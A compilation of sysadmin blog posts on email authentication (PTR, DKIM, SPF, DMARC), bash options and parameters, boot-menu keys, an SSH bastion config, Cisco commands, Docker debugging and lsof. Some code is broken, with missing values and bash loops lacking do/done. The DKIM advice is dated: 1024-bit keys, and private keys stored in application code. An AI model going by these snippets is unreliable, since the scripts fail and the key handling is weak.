Not every IP address has a corresponding PTR record. In fact, if you took a random sampling of addresses your firewall blocked because they were up to no good, you'd probably find most have no PTR record - a dig -x gets you no information. That's also apt to be true for mail spammers, or their PTR doesn't match up: if you do a dig -x on their IP you get a result, but if you look up that result you might not get the same IP you started with.

That's why PTR records have become important. Originally, PTR records were just intended as a convenience, and perhaps as a way to be neat and complete. There still are no requirements that you have a PTR record or that it be accurate, but because of the abuse of the internet by spammers, certain conventions have grown up. For example, you may not be able to send email to some sites if you don't have a valid PTR record, or if your pointer is "generic".

How do you get a PTR record? You might think that this is done by your domain registrar - after all, they point your domain to an IP address. Or you might think whoever handles your DNS would do this. But the PTR record isn't up to them, it's up to the ISP that "owns" the IP block it came from. They are the ones who need to create the PTR record.

A reverse PTR record is critical. How critical? Don't even bother reading any further until you've verified that your ISP has correctly configured the reverse PTR record for the server that will be sending email. It is absolutely the most common check done by mail servers these days. Fail the reverse PTR check, and I guarantee that a huge percentage of the emails you send will end up in the great bit bucket in the sky -- and not in the email inboxes you intended.

2. Configure DomainKeys Identified Mail in your DNS and code

What's DomainKeys Identified Mail? With DKIM, you "sign" every email you send with your private key, a key only you could possibly know. And this can be verified by attempting to decrypt the email using the public key stored in your public DNS records. It's really quite clever!

The first thing you need to do is generate some public-private key pairs (one for every domain you want to send email from) via OpenSSL. I used a win32 version I found. Issue these commands to produce the keys in the below files:

$ openssl genrsa -out rsa.private 1024
$ openssl rsa -in rsa.private -out rsa.public -pubout -outform PEM

These public and private keys are just big ol' Base64 encoded strings, so plop them in your code as configuration string resources that you can retrieve later.

Next, add some DNS records. You'll need two new TXT records.



    "k=rsa; p={public-key-base64-string-here}"

The first TXT DNS record is the global DomainKeys policy and contact email.

The second TXT DNS record is the public base64 key you generated earlier, as one giant unbroken string. Note that the "selector" part of this record can be anything you want; it's basically just a disambiguating string.

Almost done. One last thing -- we need to sign our emails before sending them. In any rational world this would be handled by an email library of some kind. We use Mailbee.NET which makes this fairly painless:

smtp.Message = dk.Sign(smtp.Message,
null, AppSettings.Email.DomainKeyPrivate, false, "selector");

3. Set up a SPF / SenderID record in your DNS

To be honest, SenderID is a bit of a "nice to have" compared to the above two. But if you've gone this far, you might as well go the distance. SenderID, while a little antiquated and kind of.. Microsoft/Hotmail centric.. doesn't take much additional effort.

SenderID isn't complicated. It's another TXT DNS record at the root of, say,, which contains a specially formatted string documenting all the allowed IP addresses that mail can be expected to come from. Here's an example:

"v=spf1 a mx ip4: ip4: ~all"

You can use the Sender ID SPF Record Wizard to generate one of these for each domain you send email from.

That sucked. How do I know all this junk is working?

I agree, it sucked. Email sucks; what did you expect? I used two methods to verify that all the above was working:

  1. Test emails sent to a GMail account.

    Use the "show original" menu on the arriving email to see the raw message content as seen by the email server. You want to verify that the headers definitely contain the following:
    Received-SPF: pass
    Authentication-Results: ... spf=pass ... dkim=pass

    If you see that, then the Reverse PTR and DKIM signing you set up is working. Google provides excellent diagnostic feedback in their email server headers, so if something isn't working, you can usually discover enough of a hint there to figure out why.

  2. Test emails sent to the Port25 email verifier

    Port25 offers a really nifty public service -- you can send email to and it will reply to the from: address with an extensive diagnostic! Here's an example summary result from a test email I just sent to it:
    SPF check:          pass
    DomainKeys check: fail
    DKIM check: pass
    Sender-ID check: pass
    SpamAssassin check: ham

    You want to pass SPF, DKIM, and Sender-ID. Don't worry about the DomainKeys failure, as I believe it is spurious -- DKIM is the "newer" version of that same protocol.


Auteur : Harlok

2019-05-07 17:26:58

SPF, DKIM, DMARC: The 3 Pillars of Email Authentication

If you’re an email marketer, you’ve probably heard acronyms like “SPF,” “DKIM,” and “DMARC” being tossed around with little explanation. People might assume you automatically understand these terms, but the truth is that many marketers’ grasp of these concepts is vague, at best.

The good news is that SPF, DKIM, and DMARC can work together for you like a triple rainbow of email authentication, and that’s why we want you to have a thorough understanding of them. The explanations are technical, but these are three fundamental concepts to understand about email authentication. 

We’ll provide you with a brief and insightful look at each of these protocols, then you’ll be able to start tossing these acronyms around like the pros. First things first…

What is email authentication, and why is it so important?

Email authentication helps to improve the delivery and credibility of your marketing emails by implementing protocols that verify your domain as the sender of your messages.  

Using authentication won’t guarantee that your mail reaches the inbox but it preserves your brand reputation while making sure you have the best possible chance of having your messages reach their intended destination. 

Read on to find out how to ensure you’re achieving the gold standard of email authentication.

SPF, DKIM, and DMARC: 3 Technical, but Essential, Explanations

SPF: Sender Policy Framework

SPF, Sender Policy Framework, is a way for recipients to confirm the identity of the sender of an incoming email.

By creating an SPF record, you can designate which mail servers are authorized to send mail on your behalf. This is especially useful if you have a hosted email solution (Office365, Google Apps, etc.) or if you use an ESP like Higher Logic.

Here’s a brief synopsis of the process:

  1. The sender adds a record to the DNS settings.

    1. The record is for the domain used in their FROM: address (e.g. if I send from, add the record to This record includes all IP addresses (mail servers) that are authorized to send mail on behalf of this domain. A typical SPF record will look something like this:
      v=spf1 ip4: ip4: ip4: ~all

  2.  The receiving server checks the DNS records.

    1. When the mail is sent, the receiving server checks the DNS records for the domain in the FROM: field. If the IP address is listed in that record (as seen above), the message passes SPF.

  3. If SPF exists, but the IP address isn't in the record, it's a hard fail.

    1. If the SPF record exists, but the IP address of the sending mail server isn’t in the record, it’s considered a “hard-fail.” This can often cause mail to be rejected or routed to the spam folder.

  4. If no SPF record exists, it's a soft fail.

    1. If no SPF record exists at all, this is considered a “soft-fail.” These are most likely to cause messages to be routed to spam but can lead to a message being rejected as well.

DKIM: DomainKeys Identified Mail

DKIM, short for DomainKeys Identified Mail, also allows for the identification of “spoofed” emails but using a slightly different process. Instead of a single DNS record that keys off the FROM: address, DKIM employs two encryption keys: one public and one private.

The private key is housed in a secure location that can only be accessed by the owner of the domain. This private key is used to create an encrypted signature that is added to every message sent from that domain. Using the signature, the receiver of the message can check against the public DKIM key, which is stored in a public-facing DNS record. If the records “match,” the mail could only have been sent by the person with access to the private key, aka the domain owner.  

DMARC: Domain-based Message Authentication, Reporting, & Conformance

While SPF and DKIM can be used as stand-alone methods, DMARC must rely on either SPF or DKIM to provide the authentication.

DMARC (Domain-based Message Authentication, Reporting, & Conformance) builds on those technologies by providing directions to the receiver on what to do if a message from your domain is not properly authenticated.

Like SPF and DKIM, DMARC also requires a specific DNS record to be entered for the domain you wish to use in your FROM: address. This record can include several values, but only two are required:

  • (v) tells the receiving server to check DMARC

  • (p) gives instructions on what to do if authentication fails.

The values for p can include:

  • p=none, which tells the receiving server to take no specific action if authentication fails.

  • p=quarantine, which tells the receiving server to treat unauthenticated mail suspiciously. This could mean routing the mail to spam/junk, or adding a flag indicating the mail is not trusted.

  • p=reject, which tells the receiving server to reject any mail that does not pass SPF and/or DKIM authentication.

In addition to the required tags advising how to handle unauthenticated mail, DMARC also provides a reporting component that can be very useful for most organizations. By enabling the reporting features of DMARC, your organization can receive reports indicating all mail that is being sent with your domain in the FROM: address. This can help identify spoofed or falsified mail patterns as well as tracking down other business divisions or partners that may be legitimately sending mail on your behalf without authentication.


Auteur : Harlok

2019-05-07 14:46:08

Setting shell options

  • Task: Make changes to your bash shell environment using set and shopt commands.

  • The set and shopt command controls several values of variables controlling shell behavior.


List currently configured shell options

Type the following command:

set -o

Sample outputs:

allexport      	off
braceexpand on
emacs on
errexit off
errtrace off
functrace off
hashall on
histexpand on
history on
ignoreeof off
interactive-comments on
keyword off
monitor on
noclobber off
noexec off
noglob off
nolog off
notify off
nounset off
onecmd off
physical off
pipefail off
posix off
privileged off
verbose off
vi off
xtrace off

  • See set command for detailed explanation of each variable.

How do I set and unset shell variable options?

To set shell variable option use the following syntax:

set -o variableName

To unset shell variable option use the following syntax:

set +o variableName


Disable <CTRL-d> which is used to logout of a login shell (local or remote login session over ssh).

set -o ignoreeof

Now, try pressing [CTRL-d]
Sample outputs:

Use "exit" to leave the shell.

Turn it off, enter:

set +o ignoreeof

shopt command

You can turn on or off the values of variables controlling optional behavior using the shopt command. To view a list of some of the currently configured option via shopt, enter:

shopt -p

Sample outputs:

cdable_vars    	off
cdspell off
checkhash off
checkwinsize on
cmdhist on
compat31 off
dotglob off
execfail off
expand_aliases on
extdebug off
extglob off
extquote on
failglob off
force_fignore on
gnu_errfmt off
histappend off
histreedit off
histverify off
hostcomplete on
huponexit off
interactive_comments on
lithist off
login_shell off
mailwarn off
no_empty_cmd_completion off
nocaseglob off
nocasematch off
nullglob off
progcomp on
promptvars on
restricted_shell off
shift_verbose off
sourcepath on
xpg_echo off

How do I enable (set) and disable (unset) each option?

To enable (set) each option, enter:

shopt -s optionName

To disable (unset) each option, enter:

shopt -u optionName


If cdspell option set, minor errors in the spelling of a directory name in a cd command will be corrected. The errors checked for are transposed characters, a missing character, and one character too many. If a correction is found, the corrected file name is printed, and the command proceeds. For example, type the command (note /etc directory spelling):

cd /etcc

Sample outputs:

bash: cd: /etcc: No such file or directory

Now, turn on cdspell option and try again the same cd command, enter:

shopt -s cdspell
cd /etcc

Sample outputs:

[vivek@vivek-desktop /etc]$

Customizing Bash environment with shopt and set

Edit your ~/.bashrc, enter:

vi ~/.bashrc

Add the following commands:

# Correct dir spellings
shopt -q -s cdspell

# Make sure display get updated when terminal window get resized
shopt -q -s checkwinsize

# Turn on the extended pattern matching features
shopt -q -s extglob

# Append rather than overwrite history on exit
shopt -s histappend

# Make multi-line commandsline in history
shopt -q -s cmdhist

# Get immediate notification of background job termination
set -o notify

# Disable [CTRL-D] which is used to exit the shell
set -o ignoreeof

# Disable core files
ulimit -S -c 0 > /dev/null 2>&1

How do I setup environment variables?

Simply add the settings to ~/.bashrc:

 # Store 5000 commands in history buffer
export HISTSIZE=5000

# Store 5000 commands in history FILE
export HISTFILESIZE=5000

# Avoid duplicates in hisotry
export HISTIGNORE='&:[ ]*'

# Use less command as a pager
export PAGER=less

# Set vim as default text editor
export EDITOR=vim
export VISUAL=vim

# Oracle database specific
export ORACLE_HOME=/usr/lib/oracle/xe/app/oracle/product/10.2.0/server
export NLS_LANG=$($ORACLE_HOME/bin/

export JAVA_HOME=/usr/lib/jvm/java-6-sun/jre

# Add ORACLE, JAVA and ~/bin bin to PATH

# Secure SSH login stuff using keychain
# No need to input password again ever
/usr/bin/keychain $HOME/.ssh/id_dsa
source $HOME/.keychain/$HOSTNAME-sh

# Turn on Bash command completion
source /etc/bash_completion

# MS-DOS / XP cmd like stuff
alias edit=$VISUAL
alias copy='cp'
alias cls='clear'
alias del='rm'
alias dir='ls'
alias md='mkdir'
alias move='mv'
alias rd='rmdir'
alias ren='mv'
alias ipconfig='ifconfig'

# Other Linux stuff
alias bc='bc -l'
alias diff='diff -u'

# get updates from RHN
alias update='yum -y update'

# set eth1 as default
alias dnstop='dnstop -l 5 eth1'
alias vnstat='vnstat -i eth1'

# force colorful grep output
alias grep='grep --color'

# ls stuff
alias l.='ls -d .* --color=tty'
alias ll='ls -l --color=tty'
alias ls='ls --color=tty'


Auteur : Harlok

2019-05-10 16:43:07

Les paramètres Bash (FR)



Il est possible de fournir à un script, sur la ligne de commandes, les arguments nécessaires à son exécution. Ces arguments sont appelés "paramètres".

Il en existe deux catégories : les paramètres positionnels et les paramètres spéciaux.

Les paramètres positionnels

Ce sont tous simplement les arguments passés en "paramètres" sur la ligne de commandes, à l'invocation d'un script.

Ils sont alors affectés aux variables réservées 1,2,3,...9,10,11,... et peuvent être appelés à l'aide des expressions

Note : Le shell Bourne est limité aux paramètres de 0 à 9.

Exemple 1

Voici un petit script qui se contente d'afficher certains des arguments passés en paramètres en fonction de leur position.


echo "Le 1er paramètre est : $1"
echo "Le 3ème paramètre est : $3"
echo "Le 10ème paramètre est : ${10}"
echo "Le 15ème paramètre est : ${15}"

Il suffit alors d'invoquer le script en lui passant un certain nombre de paramètres :

./ 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

Le 1er paramètre est : 1
Le 3ème paramètre est : 3
Le 10ème paramètre est : 10
Le 15ème paramètre est : 15
ou encore :
./ un 2 trois 4 5 6 7 8 9 dix 11 12 13 14 quinze 16 17
Le 1er paramètre est : un
Le 3ème paramètre est : trois
Le 10ème paramètre est : dix
Le 15ème paramètre est : quinze

Si certains paramètres contiennent des caractères spéciaux ou des espaces, il

faut alors les "quoter" :

./ un 2 "le 3ème" 4 5 6 7 8 9 dix 11 12 13 14 "le 15ème" 16 17
Le 1er paramètre est : un
Le 3ème paramètre est : le 3ème
Le 10ème paramètre est : dix
Le 15ème paramètre est : le 15ème

Les paramètres spéciaux

Ce sont en fait là aussi des variables réservées qui permettent pour certaines d'effectuer des traitements sur les paramètres eux-même.

Ces paramètres sont les suivants :

Contient le nom du script tel qu'il a été invoqué

L'ensembles des paramètres sous la forme d'un seul argument

L'ensemble des arguments, un argument par paramètre

Le nombre de paramètres passés au script

Le code retour de la dernière commande

Le PID su shell qui exécute le script

Le PID du dernier processus lancé en arrière-plan

Exemple 2

Voici un autre petit script mettant en oeuvre l'ensemble des paramètres spéciaux vus ci-dessus.

# Affichage du nom su script
echo "Le nom de mon script est : $0"
# Affichage du nombre de paramètres
echo "Vous avez passé $# paramètres"
# Liste des paramètres (un seul argument)
for param in "$*"
echo "Voici la liste des paramètres (un seul argument) : $param"
# Liste des paramètres (un paramètre par argument)
echo "Voici la liste des paramètres (un paramètre par argument) :"
for param in "$@"
echo -e "\tParamètre : $param"
# Affichage du processus
echo "Le PID du shell qui exécute le script est : $$"
# Exécution d'une commande qui s'exécute en arrière-plan
sleep 100 &
# Affichage du processus lancé en arrière-plan
echo "Le PID de la dernière commande exécutée en arrière-plan est : $!"
# Affichage du code retour de la dernière commande "echo"
echo "Le code retour de la commande précédente est : $?"
# Génération d'une erreur
echo "Génération d'une erreur..."
# Affichage de la mauvaise commande
echo "ls /etc/password 2>/dev/null"
ls /etc/password 2>/dev/null
# Affichage du code retour de la dernière commande
echo "Le code retour de la commande précédente est : $?"
Ce qui donne avec l'invocation suivante :
./ 1 2 3 quatre 5 six

Le nom de mon script est : ./
Vous avez passé 6 paramètres
Voici la liste des paramètres (un seul argument) : 1 2 3 quatre 5 six
Voici la liste des paramètres (un paramètre par argument) :
Paramètre : 1
Paramètre : 2
Paramètre : 3
Paramètre : quatre
Paramètre : 5
Paramètre : six
Le PID du shell qui exécute le script est : 6165
Le PID de la dernière commande exécutée en arrière-plan est : 6166
Le code retour de la commande précédente est : 0
Génération d'une erreur...
ls /etc/password 2>/dev/null
Le code retour de la commande précédente est : 1

Initialiser des paramètres

- La commande "set" -

Il est possible d'affecter directement des paramètres au shell grâce à la commande

Une simple commande tel que :
set param1 param2 param3
initialisera automatiquement les paramètres positionnels
avec les valeurs
, effaçant de ce fait les anciennes valeurs si toutefois elles existaient. Les paramètres spéciaux
sont automatiquement mis à jours en conséquence.


$ set param1 param2 param3
$ echo "Nombre de paramètres : $#"
Nombre de paramètres : 3
$ echo "Le second paramètre est : $2"
Le second paramètre est : param2
$ echo "Les paramètres sont : $@"
Les paramètres sont : param1 param2 param3

$ set pêche pomme
$ echo "Nombre de paramètres : $#"
Nombre de paramètres : 2
$ echo "Les paramètres sont : $@"
Les paramètres sont : pêche pomme

Cette fonctionnalité peut s'avérer utile dans le traitement de fichiers ligne

par ligne afin d'isoler chaque mot (champ), et d'en formater la sortie.

$ IFS=":"; set $(grep $USER /etc/passwd)
$ echo -e "Login :\t$1\nNom :\t$5\nID :\t$3\nGroup :\t$4\nShell :\t$7"

Login : jp
Nom : Jean-Philippe
ID : 500
Group : 500
Shell : /bin/bash

- La commande "shift" -

La commande interne
permet quant à elle de décaler les paramètres.

La valeur du 1er paramètre (
) est remplacée par la valeur du 2nd paramètre (
), celle du 2nd paramètre (
) par celle du 3ème paramètre (
), etc...

On peut indiquer en argument (
shift [n]
) le nombre de pas (position) dont il faut décaler les paramètres.

Exemple 3

Voilà une mise en oeuvre de l'emploi de la commande interne "shift".


echo "Nombre de paramètres : $#"
echo "Le 1er paramètre est : $1"
echo "Le 3ème paramètre est : $3"
echo "Le 6ème paramètre est : $6"
echo "Le 10ème paramètre est : ${10}"
echo "============================================="
echo "Décalage d'un pas avec la commande \"shift\""
echo "Nombre de paramètres : $#"
echo "Le 1er paramètre est : $1"
echo "Le 3ème paramètre est : $3"
echo "Le 6ème paramètre est : $6"
echo "Le 10ème paramètre est : ${10}"
echo "============================================="
echo "Décalage de quatre pas avec la commande \"shift 4\""
shift 4
echo "Nombre de paramètres : $#"
echo "Le 1er paramètre est : $1"
echo "Le 3ème paramètre est : $3"
echo "Le 6ème paramètre est : $6"
echo "Le 10ème paramètre est : ${10}"
Et son résultat :
./ 1 2 3 4 5 6 7 8 9 10

Nombre de paramètres : 10
Le 1er paramètre est : 1
Le 3ème paramètre est : 3
Le 6ème paramètre est : 6
Le 10ème paramètre est : 10
Décalage d'un pas avec la commande "shift"
Nombre de paramètres : 9
Le 1er paramètre est : 2
Le 3ème paramètre est : 4
Le 6ème paramètre est : 7
Le 10ème paramètre est :
Décalage de quatre pas avec la commande "shift 4"
Nombre de paramètres : 5
Le 1er paramètre est : 6
Le 3ème paramètre est : 8
Le 6ème paramètre est :
Le 10ème paramètre est :

Article original publié par Carlos Villagómez. Traduit par jipicy.
Dernière mise à jour le 1 juin 2017 à 17:02 par avenuepopulaire.

Ce document intitulé «  Bash - Les paramètres  » issu de CommentCaMarche ( est mis à disposition sous les termes de la licence Creative Commons.
Vous pouvez copier, modifier des copies de cette page, dans les conditions fixées par la licence, tant que cette note apparaît clairement.

Auteur : Harlok

2019-05-10 16:39:25

How to access to boot menu, bios or UEFI

ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
Acer Esc, F12, F9 Del, F2
Acer netbook Aspire One zg5, zg8 F12 F2
Acer netbook Aspire Timeline F12 F2
Acer netbook Aspire v3, v5, v7 F12 The "F12 Boot Menu" must be enabled in BIOS. It is disabled by default. F2
ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
Apple After 2006 Option
ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
Asus desktop F8 F9
Asus laptop VivoBook f200ca, f202e, q200e, s200e, s400ca, s500ca, u38n, v500ca, v550ca, v551, x200ca, x202e, x550ca, z202e Esc Delete
Asus laptop N550JV, N750JV, N550LF, Rog g750jh, Rog g750jw, Rog g750jx Esc Disable "Fast Boot" and "Secure Boot Control" in order to boot from MBR formatted media. F2
Asus laptop Zenbook Infinity ux301, Infinity ux301la, Prime ux31a, Prime ux32vd, R509C, Taichi 21, Touch u500vz, Transformer Book TX300 Esc Disable "Fast Boot" and "Secure Boot Control" in order to boot from MBR formatted media. F2
Asus notebook k25f, k35e, k34u, k35u, k43u, k46cb, k52f, k53e, k55a, k60ij, k70ab, k72f, k73e, k73s, k84l, k93sm, k93sv, k95vb, k501, k601, R503C, x32a, x35u, x54c, x61g, x64c, x64v, x75a, x83v, x83vb, x90, x93sv, x95gl, x101ch, x102ba, x200ca, x202e, x301a, x401a, x401u, x501a, x502c, x750ja F8 DEL
Asus netbook Eee PC 1015, 1025c Esc F2 Boot Tab, Boot Device Priority, 1st Boot Device, Removable Device, F10
ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
Compaq Presario Esc, F9 F10 BIOS "Advanced Tab", Boot Order
ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
Dell desktop Dimension, Inspiron, Latitude, Optiplex F12 Select "USB Flash Drive". F2
Dell desktop Alienware Aurora, Inspiron One 20, Inspiron 23 Touch, Inspiron 620, 630, 650, 660s, Inspiron 3000, X51, XPS 8300, XPS 8500, XPS 8700, XPS 18 Touch, XPS 27 Touch F12 Select "USB Flash Drive". F2
Dell desktop Inspiron One 2020, 2305, 2320, 2330 All-In-One F12 Select "USB Flash Drive". F2
Dell laptop Inspiron 11 3000 series touch, 14z Ultrabook, 14 7000 series touch, 15z Ultrabook touch, 15 7000 series touch, 17 7000 series touch F12 Select "USB Storage Device" F2 Settings->General->Boot Sequence->"USB Storage Device", then up arrow, [Apply]--[Exit]
Dell laptop Inspiron 14R non-touch, 15 non-touch, 15R non-touch, 17 non-touch, 17R non-touch F12 Select "USB Storage Device" F2 Settings->General->Boot Sequence->"USB Storage Device", then up arrow, [Apply]--[Exit]
Dell laptop Latitude c400, c600, c640, d610, d620, d630, d830, e5520, e6320, e6400, e6410, e6420, e6430, e6500, e6520, 6430u Ultrabook, x300 F12 Select "USB Storage Device" from boot menu. F2
Dell laptop Precision m3800, m4400, m4700, m4800, m6500, m6600, m6700, m6800 F12 Select "USB Storage Device" from boot menu. F2
Dell laptop Alienware 14, Alienware 17, Alienware 18, XPS 11 2-in-1, XPS 12 2-in-1, XPS 13, XPS 14 Ultrabook, XPS 15 Touch, F12 Select "USB Storage Device" from boot menu. F2
ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
eMachines F12 Tab, Del
ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
Fujitsu F12 F2
ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
HP generic Esc, F9 Esc, F10, F1
HP desktop Pavilion Media Center a1477c Esc F10 BIOS "Advanced" tab, Boot Order, Move "USB Device" before "Hard Drive"
HP desktop Pavilion 23 All In One Esc Select boot media from the menu. F10 UEFI/BIOS "Advanced" tab, Boot Order, Move "USB Device" before "Hard Drive". For non-UEFI media, disable secure boot and enable legacy support.
HP desktop Pavilion Elite e9000, e9120y, e9150t, e9220y, e9280t Esc, F9 F10
HP desktop Pavilion g6 and g7 Esc F10 UEFI/BIOS "Advanced" tab, Boot Order, Move "USB Device" before "Hard Drive"
HP desktop Pavilion HPE PC, h8-1287c Esc Then F9 for "Boot Menu" Esc F10, Storage tab, Boot Order, Legacy Boot Sources
HP desktop Pavilion PC, p6 2317c Esc Then F9 for "Boot Menu" Esc F10, Storage tab, Boot Order, Legacy Boot Sources
HP desktop Pavilion PC, p7 1297cb Esc Then F9 for "Boot Menu" Esc F10, Storage tab, Boot Order, Legacy Boot Sources
HP desktop TouchSmart 520 PC Esc Then F9 for "Boot Menu" Esc F10, Storage tab, Boot Order, Legacy Boot Sources
HP laptop 2000 Esc Then F9 for "Boot Menu". Select "Patriot Memory" on the Boot Option Menu. Esc Then F10, Storage tab, Boot Order, Legacy Boot Sources
HP notebook Pavilion g4 Esc F10 BIOS "Advanced" tab, Boot Order, Move "USB Device" before "Hard Drive"
HP notebook ENVY x2, m4, m4-1015dx, m4-1115dx, sleekbook m6, m6-1105dx, m6-1205dx, m6-k015dx, m6-k025dx, touchsmart m7 Esc Then F9 for "Boot Menu" Esc Then F10, Storage tab, Boot Order, Legacy Boot Sources
HP notebook Envy, dv6 and dv7 PC, dv9700, Spectre 14, Spectre 13 Esc Then F9 for "Boot Menu" Esc Then F10, Storage tab, Boot Order, Legacy Boot Sources
HP notebook 2000 - 2a20nr, 2a53ca, 2b16nr, 2b89wm, 2c29wm, 2d29wm Esc Then F9 for "Boot Menu" Esc Then F10, Storage tab, Boot Order, Legacy Boot Sources
HP notebook Probook 4520s, 4525s, 4540s, 4545s, 5220m, 5310m, 5330m, 5660b, 5670b Esc F10 BIOS "Advanced" tab, Boot Order, Move "USB Device" before "Hard Drive"
HP tower Pavilion a410n Esc F1 BIOS "Boot" tab, Boot Device Priority, Hard Drive Boot Priority, Move "USB-HDD0" up to #1 position.
ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
Intel F10
ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
Lenovo desktop F12, F8, F10 F1, F2
Lenovo laptop F12 F1, F2
Lenovo laptop ThinkPad edge, e431, e531, e545, helix, l440, l540, s431, t440s, t540p, twist, w510, w520, w530, w540, x140, x220, x230, x240, X1 carbon F12 F1
Lenovo laptop IdeaPad s300, u110, u310 Touch, u410, u510, y500, y510, yoga 11, yoga 13, z500 Novo button Small button on the side next to the power button. Novo button Small button on the side next to the power button.
Lenovo laptop IdeaPad P500 F12 or Fn + F11 F2
Lenovo netbook IdeaPad S10-3 F12 F2
Lenovo notebook g460, g470, g475, g480, g485 F12 F2
ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
Packard Bell F8 F1, Del
ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
Samsung F12, Esc
Samsung netbook NC10 Esc F2 Boot Tab, Select "Boot Device Priority", Press Return, Up/Down to Highlight, F6/F5 to change priority.
Samsung notebook np300e5c, np300e5e, np350v5c, np355v5c, np365e5c, np550p5c Esc F2 Boot Tab, Select "Boot Device Priority", Press Return, Up/Down to Highlight, F6/F5 to change priority.
Samsung ultrabook Series 5 Ultra, Series 7 Chronos, Series 9 Ultrabook Esc Note that you must first disable fast boot in BIOS/UEFI to boot from a USB drive. F2 Boot Tab, Select "Boot Device Priority", Press Return, Up/Down to Highlight, F6/F5 to change priority.
Samsung ultrabook Ativ Book 2, 8, 9 F2 Note that you must first disable fast boot in BIOS/UEFI to boot from a USB drive or use the F2 boot menu. F10 Boot Tab, Select "Boot Device Priority", Press Return, Up/Down to Highlight, F6/F5 to change priority.
ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
Sharp F2
ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
Sony VAIO Duo, Pro, Flip, Tap, Fit assist button assist button
Sony VAIO, PCG, VGN F11 F1, F2, F3
Sony VGN Esc, F10 F2 BIOS "BOOT" section, "External Device Boot" enabled
ManufacturerTypeModelsBoot MenuBoot OnceBIOS/UEFI KeyChange Priority
Toshiba laptop Kira, Kirabook 13, Ultrabook F12 F2
Toshiba laptop Qosmio g30, g35, g40, g50 F12 F2
Toshiba laptop Qosmio x70, x75, x500, x505, x870, x875, x880 F12 F2
Toshiba Protege, Satellite, Tecra F12 F1, Esc
Toshiba Equium F12 F12

Auteur : Harlok

2019-05-10 17:28:08

OpenSSH: Using a Bastion Host

Quick and dirty OpenSSH configlet here. If you have a set of hosts or devices that require you to first jump through a bastion host, the following will allow you to run a single ssh command:

Host *
ProxyCommand ssh -A <bastion_host> nc %h %p

Change the Host * line to best match the hostnames that require a bastion host.

Auteur : Harlok

2019-04-26 16:09:39

Cisco basic commands

Start with connecting :
telnet switch
ssh switch
To have admin privileges :
Look at the config :
show run
See the log :
show log
Sneak a peek at the power supply, fan and temps :
show environment
Show the status of an interface :
show int ... status
Go to configuration mode :
conf t
int ...

Copy the configuration ( running to persistent mem ) :

Auteur : Harlok

2019-05-13 16:24:26

The difference from being sysadmin vs developer

When you're a developer your boss wants you to do things quickly even it's buggy.
When you're a sysadmin your boss wants you to do things right even it's slow.

Auteur : Harlok

2019-04-18 13:16:08

The ways to debug an exploding Docker container

Based on the article by Tim Perry here

Everything crashes.

Sometimes things crash when they’re running inside a Docker container though, and then all of a sudden it can get much more difficult to work out why, or what the hell to do next.

If you’re stuck in that situation, here’s my goto debugging commands to help you get a bit more information on what’s up:

  1. docker logs <container_id>

    Hopefully you’ve already tried this, but if not, start here. This’ll give you the full STDOUT and STDERR from the command that was run initially in your container.

  2. docker stats <container_id>
    If you just need to keep an eye on the metrics of your container to work out what’s gone wrong, docker stats can help: it’ll give you a live stream of resource usage, so you can see just how much memory you’ve leaked so far.

  3. docker cp <container_id>:/path/to/useful/file /local-path
    Often just getting hold of more log files is enough to sort you out. If you already know what you want, docker cp has your back: copy any file from any container back out onto your local machine, so you can examine it in depth (especially useful analysing heap dumps).

  4. docker exec -it <container_id> /bin/bash
    Next up, if you can run the container (if it’s crashed, you can restart it with docker start <container_id>), shell in directly and start digging around for further details by hand.

  5. docker commit <container_id> my-broken-container && docker run -it my-broken-container /bin/bash
    Can’t start your container at all? If you’ve got a initial command or entrypoint that immediately crashes, Docker will immediately shut it back down for you. This can make your container unstartable, so you can’t shell in any more, which really gets in the way.
    Fortunately, there’s a workaround: save the current state of the shut-down container as a new image, and start that with a different command to avoid your existing failures.
    Have a failing entrypoint instead? There’s an entrypoint override command-line flag too.

Auteur : Harlok

2019-04-17 08:33:25



lsof stands for List Open Files. It is easy to remember lsof command if you think of it as “ls + of”, where ls stands for list, and of stands for open files.
It is a command line utility which is used to list the information about the files that are opened by various processes. In unix, everything is a file, ( pipes, sockets, directories, devices, etc.). So by using lsof, you can get the information about any opened files.

1. Introduction to lsof

Simply typing lsof will provide a list of all open files belonging to all active processes.

# lsof
init 1 root cwd DIR 8,1 4096 2 /
init 1 root txt REG 8,1 124704 917562 /sbin/init
init 1 root 0u CHR 1,3 0t0 4369 /dev/null
init 1 root 1u CHR 1,3 0t0 4369 /dev/null
init 1 root 2u CHR 1,3 0t0 4369 /dev/null
init 1 root 3r FIFO 0,8 0t0 6323 pipe

By default One file per line is displayed. Most of the columns are self explanatory. We will explain the details about couple of cryptic columns (FD and TYPE).

FD – Represents the file descriptor. Some of the values of FDs are,

  • cwd – Current Working Directory

  • txt – Text file

  • mem – Memory mapped file

  • mmap – Memory mapped device

  • NUMBER – Represent the actual file descriptor. The character after the number i.e ‘1u’, represents the mode in which the file is opened. r for read, w for write, u for read and write.

TYPE – Specifies the type of the file. Some of the values of TYPEs are,

  • REG – Regular File

  • DIR – Directory

  • FIFO – First In First Out

  • CHR – Character special file

For a complete list of FD & TYPE, refer man lsof.

2. List processes which opened a specific file

You can list only the processes which opened a specific file, by providing the filename as arguments.

# lsof /var/log/syslog
rsyslogd 488 syslog 1w REG 8,1 1151 268940 /var/log/syslog

3. List opened files under a directory

You can list the processes which opened files under a specified directory using ‘+D’ option. +D will recurse the sub directories also. If you don’t want lsof to recurse, then use ‘+d’ option.

# lsof +D /var/log/
